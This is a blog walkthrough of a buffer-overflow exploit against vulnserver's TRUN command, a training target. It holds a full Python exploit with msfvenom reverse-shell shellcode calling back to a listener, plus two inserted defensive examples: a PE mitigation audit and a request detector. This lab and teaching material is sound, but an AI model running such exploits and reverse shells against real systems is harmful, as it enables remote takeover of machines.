This post will be a little shorter, but I wanted to finish up my vulnserver TRUN exploit paths.
Vulnserver TRUN – Introduction
If you haven’t read my previous write-up on the “TRUN” command, then I suggest you start with that one.
This exploit will pick up somewhere in the middle of the last one, with a different exploit path.
In this case, I will go with the standard vanilla EIP overwrite with a JMP ESP. For another example, you can visit the following write-up.
Finding the Jump
First, I started by taking a look at the modules again.
In this case, I decided to use the essfunc.dll, as I would not need to worry about null bytes.
Next, I used mona to search for a JMP ESP in the library.
!mona find -s "\xff\xe4" -m essfunc.dll (ff e4 = JMP ESP)
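The module choice above comes down to values recorded in the PE header: the image base decides whether the module's addresses contain a null byte, and a hard-coded address such as 0x625011af stays valid only while the image is not relocated. The following is an added example, not code from the original post, that reads those values the way a hardening audit would. The helper names and the constructed header (including the 0x62500000 base, chosen so its range would contain the post's address) are assumptions.

```python
import struct

# IMAGE_OPTIONAL_HEADER DllCharacteristics bits (PE/COFF specification)
DYNAMIC_BASE = 0x0040   # ASLR: the loader may relocate the image
NX_COMPAT = 0x0100      # image is marked DEP-compatible


def audit_pe32(image):
    """Report image base and mitigation flags of a 32-bit PE image."""
    if image[:2] != b"MZ":
        raise ValueError("not a PE file: missing MZ header")
    (pe_off,) = struct.unpack_from("<I", image, 0x3C)      # e_lfanew
    if image[pe_off:pe_off + 4] != b"PE\x00\x00":
        raise ValueError("missing PE signature")
    opt = pe_off + 4 + 20                                  # skip COFF header
    (magic,) = struct.unpack_from("<H", image, opt)
    if magic != 0x10B:
        raise ValueError("only PE32 images are handled here")
    (base,) = struct.unpack_from("<I", image, opt + 28)    # ImageBase
    (flags,) = struct.unpack_from("<H", image, opt + 70)   # DllCharacteristics
    return {
        "image_base": base,
        "aslr": bool(flags & DYNAMIC_BASE),
        "dep": bool(flags & NX_COMPAT),
        # A base below 0x01000000 puts a \x00 byte in the module's addresses.
        "null_in_addresses": (base >> 24) == 0,
    }


def make_header(image_base, dll_characteristics):
    """Constructed sample: the smallest header audit_pe32() can read."""
    dos = b"MZ" + b"\x00" * 0x3A + struct.pack("<I", 0x40)
    opt = bytearray(96)
    struct.pack_into("<H", opt, 0, 0x10B)
    struct.pack_into("<I", opt, 28, image_base)
    struct.pack_into("<H", opt, 70, dll_characteristics)
    return dos + b"PE\x00\x00" + b"\x00" * 20 + bytes(opt)


# Constructed inputs: a fixed-base module, and the same module rebuilt
# with ASLR and DEP enabled.
legacy = audit_pe32(make_header(0x62500000, 0x0000))
hardened = audit_pe32(make_header(0x62500000, DYNAMIC_BASE | NX_COMPAT))

if __name__ == "__main__":
    print("legacy  ", legacy)
    print("hardened", hardened)
```

A module that reports `aslr: False` keeps its instructions at the same addresses on every run, which is the property a hard-coded return address depends on.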
Verifying the Jump
I selected one of the instructions randomly (0x625011af), and updated my payload.
buffer += "\x90" * 2001
# 0x625011af = JMP ESP
buffer += "\xaf\x11\x50\x62"
buffer += "\xcc" * (5000 - len(buffer))
As you can see, the breakpoint was hit as expected.
Additionally, the stack has my interrupts, so the exploit can now be finished!
With my skeleton in place, I generated some reverse shellcode to connect back to me.
[email protected]:~/vulnserver# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.0.1 LPORT=4444 -b "\x00" -f py
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
Found 10 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 351 (iteration=0)
x86/shikata_ga_nai chosen with final size 351
Payload size: 351 bytes
Final size of py file: 1684 bytes
Once I added the new shellcode to my exploit, I re-sent the full payload.
[email protected]:~/vulnserver# python trun_eip_reverse.py
Welcome to Vulnerable Server! Enter HELP for help.
[+] Sending exploit...
As you can see, I was able to catch the reverse shell and complete the exploit!
[email protected]:~/vulnserver# nc -lvp 4444
listening on [any] 4444 ...
192.168.0.2: inverse host lookup failed: Unknown host
connect to [192.168.0.1] from (UNKNOWN) [192.168.0.2] 49158
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.

C:\Users\IEUser\Downloads\vulnserver-master> whoami
whoami
ie8win7\ieuser

C:\Users\IEUser\Downloads\vulnserver-master>
Additionally, the server was not crashing at all, as seen in the following screenshot.
Here is the final exploit that I used for my reverse shell.
#!/usr/bin/python
import socket
import os
import sys

host = "192.168.0.2"
port = 9999

buf = ""
buf += "\xbe\x97\x7c\x63\x8e\xdb\xc8\xd9\x74\x24\xf4\x5f\x2b"
buf += "\xc9\xb1\x52\x31\x77\x12\x83\xef\xfc\x03\xe0\x72\x81"
buf += "\x7b\xf2\x63\xc7\x84\x0a\x74\xa8\x0d\xef\x45\xe8\x6a"
buf += "\x64\xf5\xd8\xf9\x28\xfa\x93\xac\xd8\x89\xd6\x78\xef"
buf += "\x3a\x5c\x5f\xde\xbb\xcd\xa3\x41\x38\x0c\xf0\xa1\x01"
buf += "\xdf\x05\xa0\x46\x02\xe7\xf0\x1f\x48\x5a\xe4\x14\x04"
buf += "\x67\x8f\x67\x88\xef\x6c\x3f\xab\xde\x23\x4b\xf2\xc0"
buf += "\xc2\x98\x8e\x48\xdc\xfd\xab\x03\x57\x35\x47\x92\xb1"
buf += "\x07\xa8\x39\xfc\xa7\x5b\x43\x39\x0f\x84\x36\x33\x73"
buf += "\x39\x41\x80\x09\xe5\xc4\x12\xa9\x6e\x7e\xfe\x4b\xa2"
buf += "\x19\x75\x47\x0f\x6d\xd1\x44\x8e\xa2\x6a\x70\x1b\x45"
buf += "\xbc\xf0\x5f\x62\x18\x58\x3b\x0b\x39\x04\xea\x34\x59"
buf += "\xe7\x53\x91\x12\x0a\x87\xa8\x79\x43\x64\x81\x81\x93"
buf += "\xe2\x92\xf2\xa1\xad\x08\x9c\x89\x26\x97\x5b\xed\x1c"
buf += "\x6f\xf3\x10\x9f\x90\xda\xd6\xcb\xc0\x74\xfe\x73\x8b"
buf += "\x84\xff\xa1\x1c\xd4\xaf\x19\xdd\x84\x0f\xca\xb5\xce"
buf += "\x9f\x35\xa5\xf1\x75\x5e\x4c\x08\x1e\xa1\x39\x12\xdf"
buf += "\x49\x38\x12\xce\xd5\xb5\xf4\x9a\xf5\x93\xaf\x32\x6f"
buf += "\xbe\x3b\xa2\x70\x14\x46\xe4\xfb\x9b\xb7\xab\x0b\xd1"
buf += "\xab\x5c\xfc\xac\x91\xcb\x03\x1b\xbd\x90\x96\xc0\x3d"
buf += "\xde\x8a\x5e\x6a\xb7\x7d\x97\xfe\x25\x27\x01\x1c\xb4"
buf += "\xb1\x6a\xa4\x63\x02\x74\x25\xe1\x3e\x52\x35\x3f\xbe"
buf += "\xde\x61\xef\xe9\x88\xdf\x49\x40\x7b\x89\x03\x3f\xd5"
buf += "\x5d\xd5\x73\xe6\x1b\xda\x59\x90\xc3\x6b\x34\xe5\xfc"
buf += "\x44\xd0\xe1\x85\xb8\x40\x0d\x5c\x79\x70\x44\xfc\x28"
buf += "\x19\x01\x95\x68\x44\xb2\x40\xae\x71\x31\x60\x4f\x86"
buf += "\x29\x01\x4a\xc2\xed\xfa\x26\x5b\x98\xfc\x95\x5c\x89"

buffer = "\x90" * 2001
# 0x625011af = JMP ESP
buffer += "\xaf\x11\x50\x62"
buffer += "\x90" * 16
buffer += buf
buffer += "\x90" * (5000 - len(buffer))

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host,port))
print s.recv(1024)
print "[+] Sending exploit..."
s.send("TRUN /.../" + buffer)
print s.recv(1024)
s.close()
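Seen from the defending side, the request built above stands out on the wire: a short command keyword followed by a 5,000-byte argument that is mostly one repeated byte. The following is an added example, not code from the original post, of a check that flags such a request. The thresholds and function names are assumptions, and the sample request is constructed with inert filler in place of the return address and shellcode.

```python
MAX_ARG = 256       # assumed ceiling for a legitimate command argument
MIN_RUN = 32        # assumed shortest single-byte run worth reporting
MAX_BINARY = 0.3    # assumed tolerated share of non-printable bytes


def longest_run(data):
    """Return (byte, length) of the longest run of one repeated byte."""
    best, best_len, run = None, 0, 0
    for i, b in enumerate(data):
        run = run + 1 if i and b == data[i - 1] else 1
        if run > best_len:
            best, best_len = b, run
    return best, best_len


def inspect_request(payload):
    """Return the reasons one client request looks like an overflow attempt."""
    verb, _, arg = payload.rstrip(b"\r\n").partition(b" ")
    name = verb.decode("ascii", "replace")
    findings = []
    if len(arg) > MAX_ARG:
        findings.append(f"{name} argument is {len(arg)} bytes")
    byte, run = longest_run(arg)
    if run >= MIN_RUN:
        findings.append(f"run of {run} x 0x{byte:02x}")
    binary = sum(1 for b in arg if b < 0x20 or b > 0x7E)
    if arg and binary / len(arg) > MAX_BINARY:
        findings.append("argument is mostly non-printable")
    return findings


def sample_overflow():
    """Constructed request with the layout of the post's buffer, inert filler."""
    body = b"\x90" * 2001 + b"BBBB" + b"\x90" * 16 + b"C" * 351
    body += b"\x90" * (5000 - len(body))
    return b"TRUN /.../" + body


if __name__ == "__main__":
    for request in (b"HELP\r\n", b"TRUN hello\r\n", sample_overflow()):
        print(request[:12], inspect_request(request))
```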
Vulnserver TRUN – Conclusion
This finishes up the TRUN command, although this exploit was obviously easier than the last one.
I’m hoping to finish up the rest of the commands soon, but that might have to wait for some other posts.
You can find the final exploit in my GitHub repository, but let me know if you think there is anything that I should add.
Ray Doyle is an avid pentester/security enthusiast/beer connoisseur who has worked in IT for almost 16 years now. From building machines and the software on them, to breaking into them and tearing it all down; he’s done it all. To show for it, he has obtained an OSCE, OSCP, eCPPT, GXPN, eWPT, eWPTX, SLAE, eMAPT, Security+, ICAgile CP, ITIL v3 Foundation, and even a sabermetrics certification!
He currently serves as a Senior Staff Adversarial Engineer for Avalara, and his previous position was a Principal Penetration Testing Consultant for Secureworks.